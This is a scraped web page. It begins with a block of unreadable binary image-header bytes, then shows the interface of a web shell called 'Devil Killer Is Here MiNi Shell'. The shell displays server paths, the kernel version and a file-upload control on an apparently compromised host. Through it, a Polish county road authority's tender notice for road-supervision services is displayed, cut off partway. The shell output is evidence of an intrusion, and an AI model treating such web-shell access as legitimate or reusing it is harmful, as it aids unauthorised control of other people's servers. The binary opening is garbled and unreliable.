JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240208/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240208/0009650701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług pełnienia nadzoru inw. nad realizacją zadania pn. „Rozbudowa dróg powiatowych na odcinku Świedziebnia–Janowo o dług. około 2,300 km i na odcinku w msc Brzozie o dług. 0,850 km </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Brodnicy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 340750290</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Karbowo, ul. Wczasowa 46</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brodnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">564982859</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat.zdp@brodnica.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zdp-brodnica.bip.net.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarząd drogami powiatowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług pełnienia nadzoru inw. nad realizacją zadania pn. „Rozbudowa dróg powiatowych na odcinku Świedziebnia–Janowo o dług. około 2,300 km i na odcinku w msc Brzozie o dług. 0,850 km </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bd6d21ba-c3a5-11ee-a84d-d63fc4d19e65</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00096507</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bd6d21ba-c3a5-11ee-a84d-d63fc4d19e65 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Zgodnie z art. 61 ust. 1 ustawy pzp, komunikacja w niniejszym postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>Środkiem komunikacji elektronicznej, w niniejszym postępowaniu, jest „Platforma e-Zamówienia”, zwana dalej „Platformą”, która jest<br/>dostępna pod adresem https://ezamowienia.gov.pl oraz poczta elektroniczna Zamawiającego sekretariat.zdp@brodnica.com.pl z<br/>zastrzeżeniem, że przesyłanie ofert do postępowania jest możliwe wyłącznie za pomocą platformy. Zamawiający nie przewiduje<br/>sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanych wyżej.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>2. Szczegółowe informacje i wymagania techniczne i organizacyjne na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl (link bezpośredni do treści Regulaminu - https://ezamowienia.gov.pl/pl/regulamin/) oraz informacje<br/>zamieszczone w zakładce „Centrum Pomocy” oraz „FAQ”, dostępne pod adresem https://ezamowienia.gov.pl/pl/komponentedukacyjny/.<br/>3. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>4. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).<br/>5. W przedmiotowym postępowaniu ofertę i oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, sporządza się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>6. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 ww. rozporządzenia, tj.:<br/>1) oferty,<br/>2) oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp,<br/>3) podmiotowe środki dowodowe, w tym oświadczenie o którym mowa w art. 117 ust. 4 ustawy Pzp,<br/>4) zobowiązanie podmiotu udostępniającego zasoby o którym mowa w art. 118 ust. 3 ustawy Pzp,<br/>5) przedmiotowe środki dowodowe,<br/>6) pełnomocnictwo,<br/>7) dokumenty, o których mowa w art. 94 ust. 2 ustawy Pzp<br/>- sporządza się w postaci elektronicznej, w formatach danych określonych w Rozporządzeniu Rady Ministrów z dnia 12.04.2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tekst jedn. Dz. U. z 2017 r. poz. 2247) dalej zwane „rozporządzenie KRI”, tj. m.in. .doc, .odt, .docx, .txt, .xls, .xlsx, .xml, .ppt, .pdf, .jpg, .zip, .7Z., z zastrzeżeniem formatów, o których<br/>mowa w art. 66 ust. 1 ustawy Pzp, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>7. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg ze szczególnym wskazaniem na .pdf, zaś w celu<br/>ewentualnej kompresji danych zamawiający rekomenduje .zip lub .7Z .<br/>8. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów z dnia<br/>30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, tj.:<br/>1) wyjaśnienia rażąco niskiej ceny,<br/>2) wyjaśnienia treści oferty lub dokumentów,<br/>3) wnioski o wyjaśnienia treści dokumentów zamówienia,<br/>4) zgoda Wykonawcy na przedłużenie terminu związania ofertą,<br/>5) zakwestionowanie poprawienia omyłki o której mowa w art. 223 ust. 2 pkt 3 ustawy Pzp,<br/>6) zgoda Wykonawcy na wybór jego oferty po upływie terminu związania ofertą,<br/>- sporządza się w postaci elektronicznej: w formatach danych określonych w przepisach rozporządzenia KRI i przekazuje się jako<br/>załącznik lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">KLAUZULA INFORMACYJNA DOTYCZĄCA PRZETWARZANIA DANYCH OSOBOWYCH<br/><br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	administratorem Pani/Pana danych osobowych jest Dyrektor Zarządu Dróg Powiatowych w Brodnicy Karbowo, ul. Wczasowa 46, 87-300 Brodnica <br/>tel. 56 49-828-59, Fax 56 49-340-31.<br/>2)	inspektorem ochrony danych osobowych w Zarządzie Dróg Powiatowych w Brodnicy jest Pani Agnieszka Jabłońska: agnieszka.jablonska@brodnica.com.pl, tel. 56 49-828-59*;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego na Świadczenie usług pełnienia nadzoru inwestorskiego w branży drogowej, sanitarnej i telekomunikacyjnej nad realizacją zadania pn. „Rozbudowa dróg powiatowych na odcinku Świedziebnia – Janowo o długości około 2,300 km i na odcinku w miejscowości Brzozie o długości 0,850 km”, Nr sprawy: TN.3211-6/24 oraz zawarcia umów na realizację tego zamówienia a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywających na Zamawiającym;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy pzp; <br/>5)	Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia realizacji zamówienia publicznego, a jeżeli czas realizacji zamówienia przekracza 4 lat, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/><br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TN.3211-6/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> OPZ Zadanie nr 1:<br/>1. Część 1 (Zadanie 1): Pełnienie nadzoru inwestorskiego w branży drogowej nad realizacją robót budowlanych w inwestycji pn. „Rozbudowa dróg powiatowych na odcinku Świedziebnia – Janowo o długości około 2,300 km i na odcinku w miejscowości Brzozie o długości 0,850 km”. Lokalizacja nadzorowanych robót na odcinkach dróg:<br/>1.1 Droga powiatowa nr 1827C na odcinku Świedziebnia – Janowo, od km 2+138 do km 4+415 (kilometraż lokalny zgodnie z Projektem Zagospodarowania Terenu), obręb, Świedziebnia, Janowo gm. Świedziebnia oraz<br/>1.2. Droga powiatowa nr 1808C na odcinku przez miejscowość Brzozie, od km 2+670 do km 3+481 (kilometraż lokalny zgodnie Projektem Zagospodarowania Terenu), obręb Brzozie, gm. Brzozie. <br/>2. Zamawiający informuje, że dysponuje decyzjami zezwalającymi na realizację tych inwestycji drogowych (decyzje „ZRID”), tj. nr 3.2021 z dnia 12.07.2021 na inwestycję w gminie Świedziebnia oraz nr 1.2022 z dnia 24.08.2022 na inwestycję w gminie Brzozie, wydanymi zgodnie z przepisami art. 11a ustawy z dnia 10 kwietnia 2003 r o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (tekst jedn. Dz.U.2022.176 ze zmianami). <br/>3. Zakres obowiązków inspektora nadzoru (wspólne dla wszystkich branż):<br/>1)	Udział w czynnościach przekazania Wykonawcy robót budowlanych terenu budowy.<br/>2)	Sprawowanie funkcji nadzoru inwestorskiego w ramach branży drogowej/sanitarnej, energetycznej/telekomunikacyjnej zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U. z 2023 r. poz. 682 z późn. zm.). W ramach tych czynności Wykonawca zobowiązuje się w szczególności do:<br/>a) reprezentowania Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji zadania z projektem wykonawczym danej branży, obowiązującymi przepisami, obowiązującymi normami oraz zasadami wiedzy technicznej,<br/>b) sprawdzania jakości wykonanych robót budowlanych, wbudowanych materiałów, z w szczególności do zapobiegania zastosowaniu materiałów nie dopuszczonych do obrotu i stosowania w budownictwie,<br/>c) sprawdzania i odbioru robót budowlanych ulegających zakryciu i zanikających,<br/>d/ przygotowania i stwierdzenia gotowości do odbioru końcowego zadania oraz udział w czynnościach odbioru końcowego,<br/>e) potwierdzenia ilości wykonanych robót,<br/>f) potwierdzenia usunięcia wad stwierdzonych przy odbiorze końcowym zadania,<br/>g/ sprawdzenia rozliczeń wykonawców robót budowlanych i potwierdzenia należnych im kwot,<br/>h) rozliczenia końcowego zadania.<br/>3)	Kontrola zgodności realizacji zadania przez cały okres realizacji zamówienia. Sprawdzanie robót minimum 2 razy w tygodniu (z maksymalnie dwudniowym odstępem czasowym) potwierdzone wpisem do dziennika budowy oraz zdjęciem z budowy w wersji elektronicznej.<br/>4)	Udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.<br/>4. Zakres nadzorowanych robót w branży drogowej:<br/>1) Zakres nadzorowanych robót br. drogowej w ramach rozbudowy drogi powiatowej nr 1827C na odcinku Świedziebnia – Janowo o długości około 2,300 km obejmuje m. in.:<br/>a)	poszerzenie jezdni do 6,0m i wykonanie dodatkowych warstw bitumicznych jezdni wzmocnionych siatką z włókien szklanych,<br/>b)	budowa ciągu pieszo-rowerowego o nawierzchni z betonu asfaltowego,<br/>c)	przebudowa i budowa chodników o nawierzchni z kostki betonowej,<br/>d)	wykonanie umocnionych poboczy o szer. 1,0 m, <br/>e)	budowa i przebudowa zjazdów,<br/>f)	budowa peronów przystankowych, zatok autobusowych i zatok postojowych <br/>w miejscowości Świedziebnia,<br/>h)	budowa zatok postojowych,<br/>i)	doświetlenie przejść dla pieszych oświetleniem hybrydowym,<br/>j)	odtworzenie rowów odwadniających,<br/>k)	przebudowę i rozbudowę skrzyżowań z drogami gminnymi i powiatowymi,<br/>l)	doświetlenie przejść dla pieszych oświetleniem hybrydowym,<br/>m)	wycinkę drzew kolidujących z inwestycją,<br/>n)	nasadzenia zastępcze drzew i krzewów,<br/>o)	wykonanie oznakowania pionowego, poziomego i urządzeń bezpieczeństwa ruchu drogowego.<br/>2) Zakres nadzorowanych robót br. drogowej w ramach rozbudowy drogi powiatowej nr 1808C na odcinku w miejscowości Brzozie o długości 0,850 km” obejmuje m. in.:<br/>a)	poszerzenie jezdni do 6,0m i wykonanie dodatkowych warstw bitumicznych jezdni wzmocnionych siatką z włókien szklanych,<br/>b)	przebudowa i budowa chodników o nawierzchni z kostki betonowej,<br/>c)	wykonanie umocnionych poboczy o szer. 1,0 m, <br/>d)	budowa i przebudowa zjazdów,<br/>e)	budowa peronów przystankowych,<br/>f)	odtworzenie rowów odwadniających,<br/>g)	przebudowę przepustów drogowych,<br/>h)	przebudowę i rozbudowę skrzyżowań z drogami gminnymi i powiatowymi,<br/>i)	wycinkę drzew kolidujących z inwestycją,<br/>j)	doświetlenie przejść dla pieszych oświetleniem hybrydowym,<br/>k)	wykonanie oznakowania pionowego, poziomego i urządzeń bezpieczeństwa ruchu drogowego.<br/>5. Zamawiający nie wymaga zatrudnienia, na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących czynności w zakresie realizacji przedmiotu zamówienia, ponieważ wykonywanie tych czynności nie polega na wykonywaniu pracy w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (tekst jedn. Dz. U. z 2020 r. 1320 późn. zm.).<br/>6. Szczegółowy zakres robót budowlanych będących przedmiotem nadzoru przez inspektorów nadzoru zawiera dokumentacja projektowa, specyfikacje techniczne wykonania i odbioru robót i przedmiary poszczególnych robót, stanowiące załączniki do przedmiotowego postępowania. Ww. dokumenty dostępne są w miejscu opublikowania SWZ na stronie internetowej postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych powyższej inwestycji pod adresem: https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-bd6d21ba-c3a5-11ee-a84d-d63fc4d19e65 <br/>7.Koszt robót budowlanych (po przetargu):9.247.157,53 zł brutto<br/>W tym:<br/>1)	Rozbudowa drogi powiatowej Nr 1827C na odc. Świedziebnia – Janowo - 5.377.601,18 zł brutto<br/>W tym branże:	<br/>Drogowa:- 5.377.601,18 zł brutto<br/>2)	Rozbudowa drogi powiatowej Nr 1808C odc. przez miejscowość Brzozie - 3.869.556,35 zł brutto<br/>W tym branże:<br/>Drogowa:- 3.082.556,35 zł brutto<br/>Sanitarna:-510.000,00 zł brutto<br/>Telekomunikacyjna:-277.000,00 zł brutto. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">17 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający będzie dokonywał wyboru najkorzystniejszej oferty w każdej części zamówienia (zadaniu) oddzielnie. <br/>2. Przy dokonywaniu wyboru najkorzystniejszej oferty w każdej części Zamawiający będzie oceniał oferty w kryterium Cena 60% (60 pkt możliwych do uzyskania) i Doświadczenie Inspektora Nadzoru 40 % (40 pkt możliwych do uzyskania). W kryterium &#34;Cena&#34; oferta częściowa z najniższą ceną w 